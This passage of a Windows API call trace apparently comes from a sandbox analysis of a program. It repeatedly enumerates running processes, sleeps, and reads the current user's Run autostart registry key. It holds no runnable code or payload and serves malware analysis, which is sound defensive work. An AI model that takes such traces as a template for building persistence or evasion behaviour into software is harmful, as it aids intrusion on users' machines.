(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.058] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.060] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.060] NtClose (Handle=0x274) returned 0x0 [0175.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.071] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.072] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.072] NtClose (Handle=0x274) returned 0x0 [0175.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.092] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.094] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.094] NtClose (Handle=0x274) returned 0x0 [0175.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.123] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.125] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.125] NtClose (Handle=0x274) returned 0x0 [0175.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.144] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.145] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.145] NtClose (Handle=0x274) returned 0x0 [0175.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.163] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.164] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.164] NtClose (Handle=0x274) returned 0x0 [0175.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.216] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.218] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.218] NtClose (Handle=0x274) returned 0x0 [0175.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.268] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.269] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.269] NtClose (Handle=0x274) returned 0x0 [0175.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.279] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.280] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.280] NtClose (Handle=0x274) returned 0x0 [0175.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.299] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.300] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.300] NtClose (Handle=0x274) returned 0x0 [0175.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.314] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.315] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.315] NtClose (Handle=0x274) returned 0x0 [0175.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.322] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.328] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.329] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.329] NtClose (Handle=0x274) returned 0x0 [0175.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.342] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.343] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.343] NtClose (Handle=0x274) returned 0x0 [0175.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.352] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 